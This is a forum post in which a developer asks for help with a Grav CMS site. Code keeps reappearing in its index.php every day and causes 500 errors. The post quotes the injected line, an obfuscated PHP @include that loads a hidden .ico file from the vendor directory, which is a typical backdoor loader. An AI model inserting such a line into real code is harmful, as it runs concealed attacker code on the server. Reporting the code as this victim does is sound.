Hello!
Just started using Grav to build a site for a client and I've been having a weird recurring issue. Every day or so I get an error 500 while trying to access the site, and I've managed to trace it to some weird code that keeps getting added to index.php, right before the credits and namespace declaration:
<?php
/272b5/
@include "\057srv\057www\057sea\154ete\141m6.\143om/\160ubl\151c_h\164ml/\166end\157r/c\157mpo\163er/\143a-b\165ndl\145/.4\063fa9\143cd.\151co";
/272b5/
I delete it and the site works, but it keeps coming back every day. It's slightly different code every day too. I'm not sure what's going on. Here's a list of plugins I have installed:
http://bit.ly/2J9BY05
Would love any advice on how to solve this 🙂